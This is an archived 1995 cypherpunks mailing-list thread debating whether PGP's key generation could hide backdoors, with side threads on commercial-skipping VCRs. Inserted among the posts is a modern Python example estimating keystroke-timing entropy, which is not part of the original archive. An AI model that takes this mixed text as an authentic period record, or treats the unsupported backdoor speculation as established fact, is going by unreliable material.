of those "Weekly World News" cover page T-shirts. I want to get
the one with "12 US Senators are Space Aliens" because it has
both of my Senators on the cover, myself...

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 17:37:01 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <v02120d06ac432493c978@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:08 PM 7/31/95, Dr. Fred said:

>it is impractical to verify that there
>are no subtle back doors

Ah. I knew my undergraduate philosophy degree from good ol' Mizzou would
come in handy some day.  In the sophistry biz, the above is an informal
fallacy. It's called disproving a negative, more popularly called the
"Flying Saucer" fallacy, as in, "prove to me that flying saucers (or PGP
trap-doors) don't exist".

I would put the rest of your rejoinder in the same class of tinker-toy
logic, Doc.

You're testing my patience. Feeling flush from my New Orleans road trip, I
went out and bought the commercial version of Eudora, filter-feature and
all, which means I'm just itching to test it. In other words, it means you
are flirting with the kill-file, the bozo-filter, more rudely, a
<plonk!ing>.

Play nice, Doc, or don't play at all.

Cheers,
Bob Hettinga







-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 18:45:59 PDT
To: stewarts@ix.netcom.com
Subject: Sat phone permit "wire"taps
In-Reply-To: <199507310913.CAA02091@ix2.ix.netcom.com>
Message-ID: <199508010141.AA02724@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill, I also understood that the Walkers also leaked to the Soviets
details on U.S. submarine sonar operating procedures.

_Anyway_, my point was, if they can't keep _that_ secret, I doubt
they'd be able to keep secret the details/keys for activating the
backdoor on whatever artificially weakened system they're forced to
use (if they are).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 18:51:30 PDT
To: danisch@ira.uka.de
Subject: Sex & Crime TV filter
In-Reply-To: <9507311424.AA01110@elysion.iaks.ira.uka.de>
Message-ID: <199508010146.AA03453@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 31 Jul 1995 16:24:25 +0200
   From: danisch@ira.uka.de (Hadmut Danisch)
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   Yesterday I heard in the radio that someone in America has developed
   some device which darkens the TV screen if there is sex or crime on TV. 

   Does anyone know whether this is true and how it works?

   Hadmut

Actually it's licensed from a British manufacturer of sunglasses called
the Peril-Sensitive Sense-O-Matics, which darken rapidly to keep you
from seeing things that might distress you.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 17:56:16 PDT
To: warlord@MIT.EDU (Derek Atkins)
Subject: Re: a hole in PGP
In-Reply-To: <199507312340.TAA02533@toxicwaste.media.mit.edu>
Message-ID: <9508010049.AA05263@all.net>
MIME-Version: 1.0
Content-Type: text


> > 	Your assertion that I could find the backdoor by inspecting the
> > program is the wrong tactic for secure programs.  If you want people to
> > believe that a program is secure, you had better come up with good
> > reasons that it is secure, and not hide behind "if you can't find any
> > holes, it must be secure".
> 
> This is where you are very wrong.  I am not saying that "if you can't
> find any holes it must be secure".  What I am saying is that the
> source is available, and thousands of people have looked at the
> source, and none of them have found any holes in it.

History shows that your approach fails. Here are some examples:

	Tens of thousands of people had source to the http daemon from
	CERN, and yet none of them noticed a hole that was detected as
	it was being exploited only a few months ago. 

	Tens of thousands of people have access to sendmail and yet
	new holes are found by attackers several times per year on
	average.

	Tens of thousands of people have access to the sources of
	various versions of hundreds of software packages, yet there
	are holes found every day.

> >  - to wit: What makes you think PGPs method
> > of getting seeds does not lead to a limited key space that is within the
> > realm of modern computers to search?
> 
> How do you propose that a user's keystrokes can be analyzed?  If you
> assume that the PC's internal clock speed >> typing speed (which is a
> good assumption -- how many keystrokes/second can you type?) then you
> have a large amount of randomness that can be gained from timing
> keystrokes.  Even a good typist will not have an even typestroke!
> Have you read RFC 1750?  If not, I would recommend you read it before
> you consider continuing this thread!

Request for Comments: 1750 - Randomness Recommendations for Security

"...Choosing random quantities to foil a resourceful and motivated
adversary is surprisingly difficult.  ...recommends the use of truly
random hardware techniques and shows that the existing hardware on many
systems can be used for this purpose."

PGP does not use "truly random hardware techniques"

"...For the present, the lack of generally available facilities for
generating such unpredictable numbers is an open wound in the design of
cryptographic software.  ...  the only safe strategy so far has been to
force the local installation to supply a suitable routine to generate
random numbers.  To say the least, this is an awkward, error-prone and
unpalatable solution." - 1994 - after PGP was implemented.

and then: "This informational document suggests techniques for producing
random quantities that will be resistant to such attack.  It recommends
that future systems include hardware random number generation or provide
access to existing hardware that can be used for this purpose."

"...Systems like Kerberos, PEM, PGP, etc.  are maturing and becoming a
part of the network landscape [PEM].  These systems provide substantial
protection against snooping and spoofing.  However, there is a potential
flaw.  At the heart of all cryptographic systems is the generation of
secret, unguessable (i.e., random) numbers. "

(Internet RFCs are searchable at http://all.net)

So I guess the RFC supports my contention and not yours.

> > 	Why (specifically) do you think the MIT version of PGP has no
> > backdoors and is not subject to attacks such as the one outlined in my
> > previous posting?
> 
> I think it has no backdoors because Jeff Schiller and I (among others)
> have looked closely at the random number generator code (he has taken
> a much closer look than I) and believe it to be secure.  I also know
> that I did not put any backdoors into the code (but why would you
> believe me, I must be paid by the government to say this, right?)

You might be, but even if you are not, that doesn't mean there are no
back doors.  Your inability to detect a backdoor gives me little
confidence, since this is at least an NP-complete problem and, with all
due respect, today, nobody can prove that PGP is free of backdoors.

> As to why I believe it is not subject to attack, I ask you again to go
> read RFC 1750.  PGP follows its recommendations fairly closely.  There
> is only one place where PGP fails to follow, and that is that PGP does
> expose the bucket of random bits, rather than mixing them before
> exporting them.  However I do not believe that this would affect the
> generation of PGP Public Keys.

But the RFC acknowledges that these methods are highly suspect and should
not be trusted.

> PS: In what field is your Doctorate?

Ph.D. Electrical and Computer Engineering, U. of Southern California, 1986,
subject "Computer Viruses".  My complete resume is available through the W3
server (below) under Management Analytics.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
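
The exchange above turns on how much unpredictability keystroke timing yields when the clock is, or is not, much faster than the typist. The following is an added example (not code from any poster in this thread, and not PGP's code) that quantizes a constructed set of inter-keystroke intervals at three hypothetical timer resolutions and applies a most-common-value min-entropy estimate; the sample data, the tick values and the choice of estimator are all assumptions made here.

```python
import math
from collections import Counter

# Constructed sample, NOT measured data: 16 inter-keystroke intervals in
# microseconds, in the range a human typist produces.
SAMPLE_INTERVALS_US = [
    120345, 98712, 143208, 110987, 187654, 132101, 101456, 156789,
    124890, 93012, 171234, 115678, 139876, 105432, 128765, 149321,
]

# Hypothetical timer periods in microseconds (illustrative assumptions,
# not a statement about which timers PGP reads).
TICKS_US = {
    "1 us counter": 1,
    "10 ms tick": 10_000,
    "~18.2 Hz PC BIOS tick": 54_925,
}


def quantize(intervals_us, tick_us):
    """Return the tick counts a timer with period tick_us would report."""
    if tick_us <= 0:
        raise ValueError("tick_us must be positive")
    return [t // tick_us for t in intervals_us]


def min_entropy_bits(symbols):
    """Most-common-value estimate of min-entropy per symbol, in bits.

    H_min = log2(1 / p_max), with p_max taken from observed frequencies.
    Two limits of this estimator: it can never exceed log2(len(symbols)),
    and it treats samples as independent, which typing rhythm is not.
    """
    if not symbols:
        raise ValueError("need at least one sample")
    most_common = max(Counter(symbols).values())
    return math.log2(len(symbols) / most_common)


def keystrokes_needed(target_bits, bits_per_keystroke):
    """Keystrokes required to gather target_bits, or None if the source
    yields nothing (for example key auto-repeat with identical intervals)."""
    if bits_per_keystroke <= 0:
        return None
    return math.ceil(target_bits / bits_per_keystroke)


def assess(intervals_us, tick_us, target_bits=128):
    """Return (estimated bits per keystroke, keystrokes for target_bits)."""
    bits = min_entropy_bits(quantize(intervals_us, tick_us))
    return bits, keystrokes_needed(target_bits, bits)


if __name__ == "__main__":
    for name, tick in TICKS_US.items():
        bits, need = assess(SAMPLE_INTERVALS_US, tick)
        print(f"{name:24s} {bits:5.3f} bits/keystroke, "
              f"{need} keystrokes for 128 bits")
    # Failure mode: a held key auto-repeating at a fixed 33 ms interval
    # contributes no timing entropy at all, whatever the clock resolution.
    print("auto-repeat:", assess([33_000] * 16, 1))
```

On this sample the estimate falls as the timer gets coarser, so the size of the seed space an attacker would have to search depends on the clock actually read, not on the typing alone.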



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 18:00:55 PDT
To: cypherpunks@toad.com
Subject: Commercial killers
Message-ID: <v02120d01ac432cb8b351@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


God help me, all of this reminds me of a Carl Sagan book, of all things.
One of his science fiction characters was said to have made his first
fortune by building a commercial zapping chip for VCRs.

Butthead Astronomer, indeed...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 18:10:12 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: a hole in PGP
In-Reply-To: <v02120d06ac432493c978@[199.0.65.105]>
Message-ID: <9508010103.AA06094@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 8:08 PM 7/31/95, Dr. Fred said:
> 
> >it is impractical to verify that there
> >are no subtle back doors
> 
> Ah. I knew my undergraduate philosophy degree from good ol' Mizzou would
> come in handy some day.  In the sophistry biz, the above is an informal
> fallacy. It's called disproving a negative, more popularly called the
> "Flying Saucer" fallacy, as in, "prove to me that flying saucers (or PGP
> trap-doors) don't exist".

More accurately, you cannot prove a forall statement about an infinite
set by demonstrating examples - but you can disprove it with a single
refutation, however, your argument is incorrect in this context.

Since current digital computers (and programs) are (close to)
finite state machines, we can prove many forall statements.  But even
more to the point, it is the job of the person asking you to trust them
to justify that trust.  If you trust them with a less-than-adequate
basis, you have only yourself to blame when you get burned. 

> I would put the rest of your rejoinder in the same class of tinker-toy
> logic, Doc.

That's me - a tinker-toy logician.  But why do you believe that PGP can be
trusted?  Because someone told you so in email on an Internet forum?  I
would hate to bet billions of dollars a day and the lives of hundreds of
thousands of people on that judgement.

> You're testing my patience. Feeling flush from my New Orleans road trip, I
> went out and bought the commercial version of Eudora, filter-feature and
> all, which means I'm just itching to test it. In other words, it means you
> are flirting with the kill-file, the bozo-filter, more rudely, a
> <plonk!ing>.

Ah!!! A threat.  You should be aware that threatening homicide is a form
of assault.  I will be certain to tell the FBI your exact words...  "the
kill-file, the bozo-filter, more rudely, a <plonk!ing>." sounds to me
(and may well sound to them) like a threat to commit murder. 

> Play nice, Doc, or don't play at all.

I am being nice, but you are not.  Perhaps you should consider
addressing the issues.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@netmarket.com (Daniel Kohn)
Date: Mon, 31 Jul 95 18:06:24 PDT
To: pjm@ionia.engr.sgi.com (Patrick May)
Subject: Re: Sex & Crime TV filter
Message-ID: <v02120d1aac432e074238@[172.16.1.244]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 8:50 PM 07/31/95, Patrick May wrote:

>     My dim memories from a project I did for Sony a couple of years
>ago are that commercials are separated by a fixed number of black
>frames and some, at least, have tracking information encoded so that
>advertisers can monitor how often they are played.  I'll try to dig up
>more info.

From: dfitzpat@interserv.com
      Wednesday July 26, 1995 -- ShopTalk

- --

NEW VCRs TAKE ON COMMERCIALS POINT-BLANK

                        By Jonathan Takiff
               Philadelphia Daily News Staff Writer


Already besieged by Washington politicians over the content of TV
programming (and threats of a show-blocking chip), television
broadcasters are about to be hit with another whammy.  This time it's
VCRs that automatically blank out commercials.

Next month, Thomson Consumer Electronics will introduce two RCA brand
videocassette recorder models that eliminate almost all the commercials
during the playback of a recorded program.

As fast as you can say, "We'll be back with stupid pet tricks, tonight's
Top Ten list and our special guest Madonna," the VCR will go into hyper-
drive and zip through two or three minutes of commercials.  During the
interruption, you can choose to see a solid blue screen on the TV
or the commercials zipping by in the rapid scan mode.

Most human operators working a remote control during a commercial break
tend to over-run the ads and plow into the show, forcing the fastidious
amongst us to then back up (yawn) the tape into the end of the last
advertisement.  But RCA's commercial-free VCR hits the brakes and
resumes play at just the right second.  At least it did in a recent
demonstration I got of the machine.

Thomson is promising "90 percent accuracy" in eliminating commercials --
and just commercials.  Sorry, the special circuitry doesn't work at all
on show breaks that are 30 seconds or less in duration.  And in case you
were worried, the recording is not tampered with in the least.  Should
there be adverts you do desire to see, or (Heaven forbid) the VCR scans
past something important, the commercial-jump mode is defeatable at any
time.

When the feature is set in the manual mode, the user initiates the
skipping process by a single button pressed on the remote control.

Most important, this technology is stupid-proof.  That is, it literally
runs itself and doesn't affect the way you tape a program.  Simply set
the timer (or hit the one-touch record button) as normally.  After a
show is recorded, the VCR checks to see if another taping session has
been programmed to start immediately.  If not, the deck will
automatically rewind the tape and then search through the recording for
signs of commercial breaks.

Actually, the VCR is looking for "rapid shifts in programming matter and
brief screen blackouts that indicate advertising," explains Randy
Staggs, manager of VCR product management for Thomson.

Where it senses a commercial clump, the VCR makes an electronic notch on
the tape at the beginning and end of the segment.  Later, these notches
will cue the VCR to fast-scan over the segment.

Originally announced two years ago for an add-on black box product
(Arista's Commercial Brake) that got lots of ink but never came to
market, Thomson has "considerably refined the [skipping] technology" it
has licensed from Arthur D. Little Enterprises, Staggs says.  "We've
changed all the algorithms [computer formulas] used for spotting the
commercials."

Thomson has exclusive rights to make commercial-free VCRs at least
through the end of the year.  It's producing the decks under guarded
conditions, Staggs says, "to hold onto our trade secrets for as long as
possible."

You'll find the commercial skip feature in RCA's hi-fi VR678HF ($499)
and four-head monaural VR542 ($399) VCR.  Both also boast VCR Plus+
programming and compatibility with the RCA Digital Satellite system.
The models should hit dealers' shelves in late August or early
September.

P.S.  Staggs claims these VCRs are "specially programmed" to not skip
past commercials for RCA products.  We think he's kidding.

$$$$ $$$$$ $$$$
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMB193KZKaCr9f/gtAQFa5AP/ZEmtSM/hSXb6zcFHDmv9Me0thtAqqCxZ
7COYgWxuLkl78+y/INpFKW861mrNig1UlO8Q+vDImKK3qUmTS1tzRWNIH9XVyYtA
pJ05g/Z/WKUPx17jd2no9oRqut4bziLa4iMj59B/4nxAhIjEtE5TZFP6okCQ1HGm
qbFhOteJavc=
=Opny
-----END PGP SIGNATURE-----

                                                           dan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 18:10:19 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <v02120d03ac432dc9f3b8@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:49 PM 7/31/95, Dr. Fred said:

>You might be, but even if you are not, that doesn't mean there are no
>back doors.

Well, we all knew it would happen, didn't we. I feel like I'm about to shoot
Ol' Yeller, but...

PLONK!

See ya on the other side, Fred.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 31 Jul 95 18:05:10 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010008.AA02790@all.net>
Message-ID: <199508010112.VAA26078@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


...
>> Look. If you're qualified, look at the PGP source and vet it yourself. If
>> you aren't qualified, figure the market to be efficient in this instance
>> and assume the stuff works.
>
>One of the several points I tried (apparently unsuccessfully) to make is
>that with a program that large, it is impractical to verify that there
>are no subtle back doors - regardless of how knowledgeable or skilled
>you or I may be.  Your "assumption of security" perspective is an
>inappropriate one unless you are trying to get people to use something
>that is not secure. 
>

It's true that, in general, the "burden" of demonstrating whether a
system is secure should fall primarily on those who claim it is rather
than on those who claim it isn't.  It's also true that PGP, for
whatever reason, is treated with a degree of reverence that is,
perhaps, unwarranted.  I, for one, would be much happier to see
greater vetting of widely-used programs like PGP.  But that does not
mean that one can expect to be taken seriously by simply throwing
darts and seeing where they land.  That would mean that essentially no
hardware, software, algorithm or protocol could ever be considered
trustworthy by anyone for any purpose.  There is a difference between
raising specific concerns and making vague, wild, unsupported claims,
which is how what you wrote below reads to me.

>> Stop wasting our time and bandwidth harassing the MIT folk about whether or
>> not their code is clean. Such posturing won't wash around here.
>
>The headers on the postings allow you to ignore them, but in the
>meanwhile, the subject matter is in line with this forum, and the
>questions are legitimate.  You will have to do better than to appeal to
>authority to convince anyone that MIT's version of PGP is secure.
>
>> <Metzger_mode("off")>
>> 
>> Seriously, it may be an appeal to authority, but it can safely be assumed
>> that PGP is clean, and that MIT is *not* involved with the NSA and the Red
>> Leptons in a conspiracy to spy on our alt.binaries.pictures.erotica.stoats
>> postings.
>
>Why (specifically) do you think so? Because you claim it? Because the
>MIT maintainer claims it? You say MIT is not associated with the NSA,
>but they have historically been funded by the NSA and other federal
>agencies for work on information security.  Do you really think that the
>only information protected by PGP is dirty pictures? Do you somehow
>think that MIT and the NSA are above that sort of thing? All you have to
>do is look at history, and it should be clear that this appeal to
>authority is often used by those trying to cover things up.  If you know
>something about PGPs security that you aren't telling us, don't beat
>around the bush about it.  Come out and say it.  Tell us that you have
>proven that PGP has no backdoors and what method you used to do that. 
>Tell us that you have hand verified all the code and that none of it
>overwrites the key generation process and tell us how you verified it.
>

No one knows how to "prove" anything substantial, much less the absence
of backdoors, for anything but the most trivial software and
algorithms.

>It cannot be safely assumed that any program is clean or that any one
>person or group is not involved with intentionally subverting security.
>That violates the fundamental principles of information protection.

Your attempt to cast a near-defamatory shadow of suspicion over the
individuals and institutions who wrote the software, without raising
even a single specific concern about something you've observed about
the code, invites more questions about your own motives than those of
MIT or its staff.  It seems reasonable to ask you to put up or shut
up.

-matt

Disclaimer: I also give away cryptographic source code, in connection
with my job as a research scientist for a company that has even closer
ties to the spook community than you seem to think MIT has...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Mon, 31 Jul 95 20:15:55 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: a hole in PGP
In-Reply-To: <9508010103.AA06094@all.net>
Message-ID: <Pine.3.89.9507312156.D29071-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:

> That's me - a tinker-toy logician.  But why do you believe that PGP can be
> trusted?  Because someone told you so in email on an Internet forum?  I
> would hate to bet billions of dollars a day and the lives of hundreds of
> thousands of people on that judgement.

Oh, yeah, right...

> > You're testing my patience. Feeling flush from my New Orleans road trip, I
> > went out and bought the commercial version of Eudora, filter-feature and
> > all, which means I'm just itching to test it. In other words, it means you
> > are flirting with the kill-file, the bozo-filter, more rudely, a
> > <plonk!ing>.
> 
> Ah!!! A threat.  You should be aware that threatening homicide is a form
> of assault.  I will be certain to tell the FBI your exact words...  "the
> kill-file, the bozo-filter, more rudely, a <plonk!ing>." sounds to me
> (and may well sound to them) like a threat to commit murder. 

Just goes to show you that you really CAN tell the idiots on the net - 
they usually sign some sort of pompous title before their name.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 19:18:07 PDT
To: fc@all.net
Subject: a hole in PGP
In-Reply-To: <9508010008.AA02790@all.net>
Message-ID: <199508010213.AA07127@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: fc@all.net (Dr. Frederick B. Cohen)
   Date: Mon, 31 Jul 1995 20:08:15 -0400 (EDT)

   One of the several points I tried (apparently unsuccessfully) to make is
   that with a program that large, it is impractical to verify that there

For better or for worse, we all must use programs (or collections
of programs) that large or larger: even if PGP could be implemented
in 1% of the current source code, it would still be running in an
operating system that's cramped in 4 megabytes of ram, because that's
a characteristic of the common modern operating systems.

The operating systems PGP is running in are larger than PGP itself; if 
PGP is too large to practically verify the nonexistence of back doors,
then there's nothing we can do whatsoever to disprove the existence
of back doors.

   ...are no subtle back doors - regardless of how knowledgeable or skilled
   you or I may be.  Your "assumption of security" perspective is an
   inappropriate one unless you are trying to get people to use something
   that is not secure. 

Or unless you're trying to subject a program to a standard nothing
ever written these days is going to meet because it runs in an
operating system that's a lot harder to verify as being secure.

Please note: I am not trying to suggest that there are purposeful or
inadvertent back doors in any of the variants of PC-DOS, Windows, or
the Macintosh OS, or more than usual in the various Unix variants (of
which the details are available on RISKS; of course, Unix can probably
be made reasonably secure if one is aware of the issues involved,
which isn't a bad idea. This isn't meant to be a disendorsement of
Unix.)

   The headers on the postings allow you to ignore them, but in the
   meanwhile, the subject matter is in line with this forum, and the
   questions are legitimate.  You will have to do better than to appeal to
   authority to convince anyone that MIT's version of PGP is secure.

Can you _convince_ me that MacOS 7.5, or Windows 3.1 (the OS I
currently use), or WWG, or OS/2 3.0, or Linux, or NetBSD, is
reasonably secure?

   Why (specifically) do you think so? Because you claim it? Because the
   MIT maintainer claims it? You say MIT is not associated with the NSA,
   but they have historically been funded by the NSA and other federal
   agencies for work on information security.  Do you really think that the
   only information protected by PGP is dirty pictures? Do you somehow
   think that MIT and the NSA are above that sort of thing? All you have to
   do is look at history, and it should be clear that this appeal to
   authority is often used by those trying to cover things up.  If you know
   something about PGPs security that you aren't telling us, don't beat
   around the bush about it.  Come out and say it.  Tell us that you have
   proven that PGP has no backdoors and what method you used to do that. 
   Tell us that you have hand verified all the code and that none of it
   overwrites the key generation process and tell us how you verified it.

   It cannot be safely assumed that any program is clean or that any one
   person or group is not involved with intentionally subverting security.
   That violates the fundamental principles of information protection.

What OS should I use to do this? Should I just give up on anything
beyond TRS-DOS 6.2?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 18:26:47 PDT
To: mab@crypto.com (Matt Blaze)
Subject: Re: a hole in PGP
In-Reply-To: <199508010112.VAA26078@crypto.com>
Message-ID: <9508010120.AA07073@all.net>
MIME-Version: 1.0
Content-Type: text


...
> It's true that, in general, the "burden" of demonstrating whether a
> system is secure should fall primarily on those who claim it is rather
> than on those who claim it isn't.  It's also true that PGP, for
> whatever reason, is treated with a degree of reverence that is,
> perhaps, unwarranted.  I, for one, would be much happier to see
> greater vetting of widely-used programs like PGP.

Excellent assessment - I wholly agree with it.

>  But that does not
> mean that one can expect to be taken seriously by simply throwing
> darts and seeing where they land.  That would mean that essentially no
> hardware, software, algorithm or protocol could ever be considered
> trustworthy by anyone for any purpose.  There is a difference between
> raising specific concerns and making vague, wild, unsupported claims,
> which is how what you wrote below reads to me.

A reasonable response.  My question is: Why do you think that the key
generation algorithm used by PGP is secure? Specifically, how do we know
there is no subtle back door that reduces the problem of testing the
typical key space to a solvable problem in today's technology?

I don't believe I made ANY "vague, wild, unsupported claims" however,
that is certainly a matter of opinion.

...
> >Why (specifically) do you think so? Because you claim it? Because the
> >MIT maintainer claims it? You say MIT is not associated with the NSA,
> >but they have historically been funded by the NSA and other federal
> >agencies for work on information security.  Do you really think that the
> >only information protected by PGP is dirty pictures? Do you somehow
> >think that MIT and the NSA are above that sort of thing? All you have to
> >do is look at history, and it should be clear that this appeal to
> >authority is often used by those trying to cover things up.  If you know
> >something about PGPs security that you aren't telling us, don't beat
> >around the bush about it.  Come out and say it.  Tell us that you have
> >proven that PGP has no backdoors and what method you used to do that. 
> >Tell us that you have hand verified all the code and that none of it
> >overwrites the key generation process and tell us how you verified it.
> 
> No one knows how to "prove" anything substantial, much less the absence
> of backdoors, for anything but the most trivial software and
> algorithms.

Excellent - have you looked at the white paper describing the secure
"get-only" W3 server available under What's New at http://all.net? I
think that this is a step in the right direction toward demonstrating
more about a program than that it runs most of the time and seems to
give reasonable answers.  Perhaps someone would like to make similar
demonstrations for PGP.

> >It cannot be safely assumed that any program is clean or that any one
> >person or group is not involved with intentionally subverting security.
> >That violates the fundamental principles of information protection.
> 
> Your attempt to cast a near-defamatory shadow of suspicion over the
> individuals and institutions who wrote the software, without raising
> even a single specific concern about something you've observed about
> the code, invites more questions about your own motives than those of
> MIT or its staff.  It seems reasonable to ask you to put up or shut
> up.

Under what analysis do you construe "It cannot be safely assumed" as
"near-defamatory"?

I don't know you any more than you know me.  We are both just mail
sources on the Internet.  Why do you consider it reasonable to assume
that we should all trust statements made by people we do not know and
have not met based on their assertion that they think a cryptosystem is
safe and free of back doors?  If I add a PGP signature, does it make
me any more trustworthy?

> Disclaimer: I also give away cryptographic source code, in connection
> with my job as a research scientist for a company that has even closer
> ties to the spook community than you seem to think MIT has...

And I should trust you to tell me that PGP is safe for me to use?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 19:25:04 PDT
To: fc@all.net
Subject: a hole in PGP
In-Reply-To: <9508010103.AA06094@all.net>
Message-ID: <199508010220.AA08136@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: fc@all.net (Dr. Frederick B. Cohen)
   Date: Mon, 31 Jul 1995 21:03:49 -0400 (EDT)

   More accurately, you cannot prove a forall statement about an infinite
   set by demonstrating examples - but you can disprove it with a single
   refutation, however, your argument is incorrect in this context.

   Since current digital computers (and programs) are (close to)
   finite state machines, we can prove many forall statements.  But even

We can prove some "forall" statements; however, it is hard to tell
in advance whether any "forall" statement is one of these easily
provable or disprovable problems.

This is informally known as the halting problem.

   more to the point, it is the job of the person asking you to trust them
   to justify that trust.  If you trust them with a less-than-adequate
   basis, you have only yourself to blame when you get burned. 

Most of us consider the release of possibly incriminating source code
to be a sign that the persons involved are worthy of trust.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 31 Jul 95 19:10:02 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Commercial killers
In-Reply-To: <ac42d528030210042967@[205.199.118.202]>
Message-ID: <199508010210.WAA28165@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Harry Bartholomew was telling me a year or so ago about some ideas for
| detecting volume changes. I think, however, the problem of distinguishing
| commercial from non-commercial signal is, I think, a tough one.

	Yes, but the tv stations put in a short period of black &
silence before returning to the show.  I'm pretty confident that this
is what the 'zip through commercials' vcrs cue on.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 31 Jul 95 19:31:45 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010120.AA07073@all.net>
Message-ID: <199508010233.WAA26805@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>A reasonable response.  My question is: Why do you think that the key
>generation algorithm used by PGP is secure? Specifically, how do we know
>there is no subtle back door that reduces the problem of testing the
>typical key space to a solvable problem in today's technology?
>

I never said that I thought that PGP (or anything else) is "secure."
But to the extent that I do trust it for any given purpose, it is for
approximately the same reasons that I trust lots of other things that
I rely on.  I've spot checked some of the code - far from an
exhaustive analysis - and I've yet to discover anything myself that
points to any specific weakness.  I assume that others have done the
same, and I also assume that someone like me who did discover a
weakness would be likely, as I would be, to publish it and that
therefore I'd hear about it.  This is, for better or for worse, about
as much as can be said for almost anything in the cryptographic world.
Far from perfect, to be sure, but hardly unusual or unique to PGP.

...

>Under what analysis do you construe "It cannot be safely assumed" as
>"near-defamatory"?

Because you seem to be pointing a finger at specific people.  Your
recent messages imply (to me, at least) that you think one or more
members of the MIT PGP project may have deliberately tampered with
some of the PGP code.  You think the risk of this sort of thing having
occurred is especially great - greater than with other products, in
fact - with MIT PGP because of some (unspecified) connection you
believe MIT has with NSA.  (If I am mistaken here and you don't think
MIT PGP is at special risk, please clarify this - I suspect others got
the same impression).  PGP did not come from "MIT".  It came from
specific individuals who work there and who are named in the code and
documentation.  They have professional and personal reputations and
feelings just like we all do.  Some of these individuals are on or
close to this list.  To imply, without offering evidence, that these
